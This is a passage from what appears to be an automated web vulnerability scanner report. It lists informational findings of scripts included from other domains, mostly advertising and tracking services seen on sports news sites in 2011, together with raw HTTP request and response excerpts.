Referer: http://bidnw.ru4.com/nf?_pnot=0&_tpc=&_wp=1.61&_nv=1&_CDbg=18121040&_eo=52787&_sm=268435456&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFCBFAEAAAAAdIsUAQAAAABZjBQBAAAAAN6XFAEAAAAA35cUAQAAAACbPexBAAAAAAAAFEAAAAAAAAAAADPOAAAAAAAAAAAAAAAAAAAzzgAAAAAAACQAAAAAAAAAN2FkYzRkMGUtOTlkMC00YTE2LWI2NjYtYzA4YmE2NWFjZDg2AAAAAAAAAAAUAAAAAAAAAEFHLTAwMDAwMDAxMzg5MzU4NTU0DwAAAAAAAAAxNzMuMTkzLjIxNC4yNDMGAAAAAAAAADcyOHg5MEIAAAAAAAAAaHR0cDovL3Nwb3J0ZGZ3LmNvbS8yMDExLzA2LzEzLzEwLW9ic2VydmF0aW9ucy1kYWxsYXMtbWF2cy1maW5hbHMvDgAAAAAAAAA0NDleMTk1XjIwOTk4NgAAAAAAAAAABgAAABwAAAAAAAYAAAAAAAAASUZSQU1FAAEADO71TQAAAAA=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

19.18. http://ad.doubleclick.net/adj/fansided.fsv/ros previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/fansided.fsv/ros

Issue detail

The response dynamically includes the following script from another domain:

http://core.videoegg.com/eap/html/js/init.js?"+Math.random()+"

Request

Response

19.19. http://adopt.imiclk.com/emb/q previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adopt.imiclk.com
Path:	/emb/q

Issue detail

The response dynamically includes the following script from another domain:

http://ad.yieldmanager.com/st?ad_type=ad&ad_size=160x600&section=1943639

Request

Response

19.20. http://adopt.imiclk.com/emb/q previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adopt.imiclk.com
Path:	/emb/q

Issue detail

The response dynamically includes the following script from another domain:

http://ad.yieldmanager.com/st?ad_type=ad&ad_size=160x600&section=1692526

Request

Response

19.21. http://bidnw.ru4.com/nf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bidnw.ru4.com
Path:	/nf

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=;u=18123865;ord=0932097?

Request

Response

19.22. http://bidnw.ru4.com/nf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bidnw.ru4.com
Path:	/nf

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=;u=18123865;ord=2951447?

Request

Response

19.23. http://bn.xp1.ru4.com/nf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bn.xp1.ru4.com
Path:	/nf

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bn.xp1.ru4.com/bclick?_f=ba80c6d3ee7a3c8edb827d9db39ffcd685104621&_o=15607&_eo=747979&_et=1307963580&_a=18121040&_s=0&_d=18123636&_pm=747979&_pn=18126789&redirect=;u=18126789;ord=7668881?

Request

Response

19.24. http://cdn.triggertag.gorillanation.com/js/triggertag.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.triggertag.gorillanation.com
Path:	/js/triggertag.js

Issue detail

The response dynamically includes the following script from another domain:

http://cdn.assets.craveonline.com/js/tracking/gn_tracking.js

Request

GET /js/triggertag.js HTTP/1.1
Host: cdn.triggertag.gorillanation.com
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/2011/06/game-of-thrones-review-baelor/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (EL)
Last-Modified: Tue, 22 Mar 2011 00:44:40 GMT
ETag: "1929-44f-49f078ca42e00"
Accept-Ranges: bytes
X-Served-By: app1v-php1.lax2
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Mon, 13 Jun 2011 11:17:58 GMT
Content-Length: 1103
Connection: close

function getTrigger(id, isDynamic) {
    var gn_country = "";
       var ca = document.cookie.split(';');
       for(var i=0;i < ca.length;i++) {
           var c = ca[i];
           while (c.charAt(0)==' ') c = c.substring(1,c.length);
           if (c.indexOf("gn_country=") == 0) {
               gn_country = c.substring(11,c.length);
               break;
           }
       }

    document.write('<script src="http://cdn.assets.craveonline.com/js/tracking/gn_tracking.js" type="text/javascript"><\/script>
...[SNIP]...

19.25. http://fansided.com/category/nba/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fansided.com
Path:	/category/nba/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://edge.quantserve.com/quant.js
http://oascentral.sportsfanlive.com/RealMedia/ads/adstream_jx.ads/fansided.sportsfanlive.com/default/jx/thirdparty/1[INSERT-TIMESTAMP]@Left?XE&Partner=fansided&PartnerUnit=fansided.160x600.1.default/jx/thirdparty&XE
http://platform.twitter.com/widgets.js
http://s46.sitemeter.com/js/counter.js?site=s46fansided
http://track4.mybloglog.com/js/jsserv.php?mblID=2009071811192340
http://widgets.twimg.com/j/2/widget.js
http://www.lijit.com/files/branding-images/lwp_hide.js
http://www.lijit.com/wijitinit?uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2Ffansided&js=1

Request

GET /category/nba/ HTTP/1.1
Host: fansided.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: w3tc_referrer=http%3A%2F%2Fsportdfw.com%2Faboutcontact-us%2F; PHPSESSID=9151522dc10d420f8f472941ef0f1ba9

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:21:52 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 Phusion_Passenger/2.2.15 mod_bwlimited/1.4 PHP/5.2.15
Vary: Accept-Encoding,Cookie
Last-Modified: Mon, 13 Jun 2011 10:54:35 GMT
Accept-Ranges: bytes
Content-Length: 70612
Cache-Control: max-age=1962, public, must-revalidate, proxy-revalidate
Expires: Mon, 13 Jun 2011 11:54:35 GMT
X-Pingback: http://fansided.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.4b
Pragma: public
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<ti
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.lijit.com/wijitinit?uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2Ffansided&js=1"></script>
<script type="text/javascript" src="http://www.lijit.com/files/branding-images/lwp_hide.js"></script>
...[SNIP]...
<div class="sbb" align="center"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

<script LANGUAGE="JavaScript1.1" SRC="http://oascentral.sportsfanlive.com/RealMedia/ads/adstream_jx.ads/fansided.sportsfanlive.com/default/jx/thirdparty/1[INSERT-TIMESTAMP]@Left?XE&Partner=fansided&PartnerUnit=fansided.160x600.1.default/jx/thirdparty&XE">
</script>
...[SNIP]...
<span class="fright"><script type="text/javascript" src="http://s46.sitemeter.com/js/counter.js?site=s46fansided">
</script>
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</noscript>

<script type='text/javascript' src='http://track4.mybloglog.com/js/jsserv.php?mblID=2009071811192340'></script>
...[SNIP]...

19.26. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The response dynamically includes the following script from another domain:

http://a.cdn.intentmedia.net/javascripts/intent_media_expedia_beacon.js

Request

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 13 Jun 2011 11:21:51 GMT
Expires: Mon, 13 Jun 2011 11:21:51 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 635
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><IFRAME width="1" he
...[SNIP]...
</IFRAME><script type="text/javascript"
src="http://a.cdn.intentmedia.net/javascripts/intent_media_expedia_beacon.js">
</script>
...[SNIP]...

19.27. http://g-ecx.images-amazon.com/images/G/01/pda/pda.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://g-ecx.images-amazon.com
Path:	/images/G/01/pda/pda.js

Issue detail

The response dynamically includes the following script from another domain:

http://bpx.a9.com/amzn/defaultad.js

Request

GET /images/G/01/pda/pda.js HTTP/1.1
Host: g-ecx.images-amazon.com
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Server
Content-Length: 9789
Last-Modified: Fri, 27 May 2011 05:57:42 GMT
Content-Type: application/x-javascript
Date: Mon, 13 Jun 2011 11:02:07 GMT
Connection: close

var slot;
var debug;
var adserver_url;
if(typeof adserver_url == "undefined") {
var httpx = document.location.protocol;
adserver_url = httpx + "//pda-as.amazon.com/getad";
}
var adF
...[SNIP]...
</script>');
} else {
document.write('<script src="http://bpx.a9.com/amzn/defaultad.js"></script>
...[SNIP]...

19.28. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

http://ib.adnxs.com/ab?enc=pHA9CtcjE0CkcD0K1yMTQAAAAGBmZgpApHA9CtcjE0CkcD0K1yMTQMJy0gu0e6hq_ayDGovBdy9v-PVNAAAAAIwuAAC1AAAAlgIAAAIAAABMSAYA0WMAAAEAAABVU0QAVVNEANgCWgAzC1gAXA8BAgUCAQQAAAAAPh8n1gAAAAA.&tt_code=vert-264&udj=uf%28%27a%27%2C+17350%2C+1307965551%29%3Buf%28%27r%27%2C+411724%2C+1307965551%29%3B&cnd=!thx3ywi9gwUQzJAZGAAg0ccBMAA4sxZAAEiWBVAAWABgVWgAcAB4AIABBIgBMpABAZgBAaABA6gBA7ABAbkBmZmZBdcjE0DBAZmZmQXXIxNAyQEzMzMzMzP3P9ABANkBAAAAAAAA8D_gAQA.&ccd=!pARxJQi9gwUQzJAZGNHHASAA&referrer=http://www.twackle.com/headlines&pp=TfX4bgAO6zEK7GXvTa8Sp21qEn1j2g77ieSo7g&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBBmNRbvj1TbHWO-_LsQenpbztBNfq-NMBr56U7BjTxe3UHAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAHD8v3sA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzmALeB8ACBMgChdLPCqgDAegDiALoA7UI9QMAAADAgAaGpqaby8Tdx_EB%26num%3D1%26sig%3DAGiWqtz6jFSI2BwglDLlvmtE5oz1KzkR8g%26client%3Dca-pub-7494156027018342%26adurl%3D

Request

Response

19.29. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/js/abg.js
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Date: Mon, 13 Jun 2011 11:26:21 GMT
Server: cafe
Cache-Control: private
Content-Length: 8432
X-XSS-Protection: 1; mode=block
Expires: Mon, 13 Jun 2011 11:26:21 GMT

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0">

<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

19.30. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

http://ib.adnxs.com/ab?enc=Pbt868OaEUA9u3zrw5oRQAAAAGBmZgpAPbt868OaEUA9u3zrw5oRQFw_DXz-IxBV_ayDGovBdy9k8vVNAAAAAIwuAAC1AAAANQEAAAIAAABsowUA0WMAAAEAAABVU0QAVVNEACwB-gAzC1gAxQ4BAgUCAQQAAAAAjCOipgAAAAA.&tt_code=vert-264&udj=uf%28%27a%27%2C+15288%2C+1307964004%29%3Buf%28%27r%27%2C+369516%2C+1307964004%29%3Bppv%2811776%2C+%276129438668761153372%27%2C+1307964004%2C+1310556004%2C+62058%2C+25553%29%3B&cnd=!myKkJwjq5AMQ7MYWGAAg0ccBMAA4sxZAAEi1AlAAWABgVWgAcBh41PkCgAGkAYgBApABAZgBAaABA6gBA7ABAbkBLGw7zMOaEUDBASxsO8zDmhFAyQHUgi7Ovlb1P9ABANkBAAAAAAAA8D_gAQA.&ccd=!gwXrLgjq5AMQ7MYWGNHHASAA&referrer=http://www.twackle.com/headlines&pp=TfXyZAABJ3gK5X4Mhbwl1tTyt_FwRWIGsDa55A&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBVZuEZPL1TfjOBIz8lQfWy_CtCO_675oCp439xBr7546PDAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQysgEPd3d3LnR3YWNrbGUuY29tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzmAKIGMACBMgCq4KlDqgDAegDiALoA7UI9QMAAADAgAausZaJi7qK4Hk%26num%3D1%26sig%3DAGiWqtxhFKVXE_5ldfsYS5dxlj4a4SAmuw%26client%3Dca-pub-7494156027018342%26adurl%3D

Request

Response

19.31. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

http://ib.adnxs.com/ab?enc=pHA9CtcjE0CkcD0K1yMTQAAAAGBmZgpApHA9CtcjE0CkcD0K1yMTQKDnkZhNUPdg_ayDGovBdy8F_PVNAAAAAIwuAAC1AAAAlgIAAAIAAABtPwYA0WMAAAEAAABVU0QAVVNEACwB-gAzC1gAIg8BAgUCAQQAAAAA-x4-0gAAAAA.&tt_code=vert-264&udj=uf%28%27a%27%2C+17979%2C+1307966469%29%3Buf%28%27c%27%2C+81255%2C+1307966469%29%3Buf%28%27r%27%2C+409453%2C+1307966469%29%3B&cnd=!rh2hMwjn-gQQ7f4YGAAg0ccBMAA4sxZAAEiWBVAAWABgVWgAcAB4AIABAIgBAJABAZgBAaABA6gBA7ABAbkBmZmZBdcjE0DBAZmZmQXXIxNAyQEzMzMzMzP3P9ABANkBAAAAAAAA8D_gAQA.&ccd=!0gWuMQjn-gQQ7f4YGNHHASAA&referrer=http://www.twackle.com/headlines&pp=TfX8BQABWbQK5XaqnT4R0Oqejqymq4K4Lk1Y6Q&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB0qOfBfz1TbSzBartlQfQo_jpCdfq-NMBl6GU7BjTxe3UHAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAHD8v3sA7IBD3d3dy50d2Fja2xlLmNvbboBCjMwMHgyNTBfYXPIAQnaASBodHRwOi8vd3d3LnR3YWNrbGUuY29tL2hlYWRsaW5lc5gCqA_AAgTIAoXSzwqoAwHoA4gC6AO1CPUDAAAAwIAG0bGZmoqTjeRB%26num%3D1%26sig%3DAGiWqtyj9eRGRlk2VYHLKcwsc_ANC0JuMA%26client%3Dca-pub-7494156027018342%26adurl%3D

Request

Response

19.32. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

http://a.adroll.com/j/rolling.js

Request

Response

19.33. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/js/r20110601/r20110607/abg.js

Request

Response

19.34. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

http://ib.adnxs.com/ab?enc=pHA9CtcjE0CkcD0K1yMTQAAAAGBmZgpApHA9CtcjE0CkcD0K1yMTQILl08oQGHZs_ayDGovBdy_9B_ZNAAAAAIwuAAC1AAAAlgIAAAIAAABJ9AUA0WMAAAEAAABVU0QAVVNEACwB-gAzC1gAAQ0BAgUCAQQAAAAA1h76uwAAAAA.&tt_code=vert-264&udj=uf%28%27a%27%2C+17350%2C+1307969533%29%3Buf%28%27r%27%2C+390217%2C+1307969533%29%3B&cnd=!1x12Owjc3gQQyegXGAAg0ccBMAA4sxZAAEiWBVAAWABgVWgAcAB4AIABBogBhAGQAQGYAQGgAQOoAQOwAQG5AZmZmQXXIxNAwQGZmZkF1yMTQMkBMzMzMzMz9z_QAQDZAQAAAAAAAPA_4AEA&ccd=!cAXULQjc3gQQyegXGNHHASAA&referrer=http://www.twackle.com/headlines&pp=TfYH_AAOvl4K7GXjwFAcGYPP8rmbov9jk0zoyA&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBGpAj_Af2Td78OuPLsQeZuMCCDNfq-NMBl6GU7BjTxe3UHAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAHD8v3sA7IBD3d3dy50d2Fja2xlLmNvbboBCjMwMHgyNTBfYXPIAQnaASBodHRwOi8vd3d3LnR3YWNrbGUuY29tL2hlYWRsaW5lc5gCtCTAAgTIAoXSzwqoAwHoA4gC6APTKegDtQjoAxT1AwAAAMCABtGxmZqKk43kQQ%26num%3D1%26sig%3DAGiWqtwHrhU44K0-Tpb07XjtCvFJalVxJw%26client%3Dca-pub-7494156027018342%26adurl%3D

Request

Response

19.35. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://pagead2.googlesyndication.com/pagead/sma8.js

Request

Response

19.36. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/js/r20110608/r20110607/abg.js

Request

Response

19.37. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

http://480-valueclick-view.c3metrics.com/v.js?id=valueclick&cid=480&t=72
http://view.atdmt.com/TLC/jview/256163696/direct/01/733392297?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB-bVH7fP1TdLbOqX6lAeF17nnCabV2egB3vGQ_xuero6XTgAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAGalLXsA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzmAK-BsACBcgC3If2CagDAegDiALoA7UI9QMAAADE%26num%3D1%26sig%3DAGiWqtwVp8fJfO4icGhBjxLnLc9ml2UIxw%26client%3Dca-pub-7494156027018342%26adurl%3D

Request

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Date: Mon, 13 Jun 2011 11:26:38 GMT
Server: cafe
Cache-Control: private
Content-Length: 2184
X-XSS-Protection: 1; mode=block
Expires: Mon, 13 Jun 2011 11:26:38 GMT

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&","&");viewReq.push(i);
...[SNIP]...
</script><script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/256163696/direct/01/733392297?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB-bVH7fP1TdLbOqX6lAeF17nnCabV2egB3vGQ_xuero6XTgAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAGalLXsA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzmAK-BsACBcgC3If2CagDAegDiALoA7UI9QMAAADE%26num%3D1%26sig%3DAGiWqtwVp8fJfO4icGhBjxLnLc9ml2UIxw%26client%3Dca-pub-7494156027018342%26adurl%3D">
</script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://480-valueclick-view.c3metrics.com/v.js?id=valueclick&cid=480&t=72"></script>
...[SNIP]...

19.38. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

http://ib.adnxs.com/ab?enc=U3dlFwwOEEBTd2UXDA4QQAAAAGBmZgpAU3dlFwwOEEBTd2UXDA4QQDnR7M6_o8sN_ayDGovBdy-l-fVNAAAAAIwuAAC1AAAANQEAAAIAAABtowUA0WMAAAEAAABVU0QAVVNEACwB-gAzC1gARgwBAgUCAQQAAAAANBzodQAAAAA.&tt_code=vert-264&udj=uf%28%27a%27%2C+15288%2C+1307965861%29%3Buf%28%27r%27%2C+369517%2C+1307965861%29%3Bppv%2811776%2C+%27994068186971033913%27%2C+1307965861%2C+1310557861%2C+62058%2C+25553%29%3B&cnd=!fyJFHQjq5AMQ7cYWGAAg0ccBMAA4sxZAAEi1AlAAWABgVWgAcBh4lPoCgAGqAYgBMpABAZgBAaABA6gBA7ABAbkBBbzX-gsOEEDBAQW81_oLDhBAyQHIZ3f-33XzP9ABANkBAAAAAAAA8D_gAQA.&ccd=!hAX0Lgjq5AMQ7cYWGNHHASAA&referrer=http://www.twackle.com/headlines&pp=TfX5pAAN4aQK5V1M5d5kiwbpvDLbQFvh6HfHtw&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBifjQpPn1TaTDN8y6lQeLyfmuDu_675oCp439xBr7546PDAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQysgEPd3d3LnR3YWNrbGUuY29tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzmAKmDsACBMgCq4KlDqgDAegDiALoA7UI9QMAAADEgAausZaJi7qK4Hk%26num%3D1%26sig%3DAGiWqtzD4mTo_k9WRjcumZlMbdufIIW4TQ%26client%3Dca-pub-7494156027018342%26adurl%3D

Request

Response

19.39. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

http://altfarm.mediaplex.com/ad/js/14302-119028-2056-12?mpt=1182167233&mpvc=http://adclick.g.doubleclick.net/aclk%253Fsa%253Dl%2526ai%253DBC8CY3PP1TbqHGMPilQeay8nGCdaooYACzvj7-xiemNXWTMDqkgMQARgBIJConBM4AFCOi6m_______8BYMnW8obIo_waoAGC5ITwA7IBD3d3dy50d2Fja2xlLmNvbboBCjMwMHgyNTBfYXPIAQnaARdodHRwOi8vd3d3LnR3YWNrbGUuY29tL-ABArgCGMACBcgC6JrhCqgDAdED4Mvbl_AJCmHoA4gC6AO1COgD6QfoA7oI6AOCAvUDAAAAxA%2526num%253D1%2526sig%253DAGiWqtyesmEogo7AuhIHfueUHf6RZzcr2w%2526client%253Dca-pub-7494156027018342%2526adurl%253D
http://pagead2.googlesyndication.com/pagead/js/abg.js
http://pagead2.googlesyndication.com/pagead/js/graphics.js

Request

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
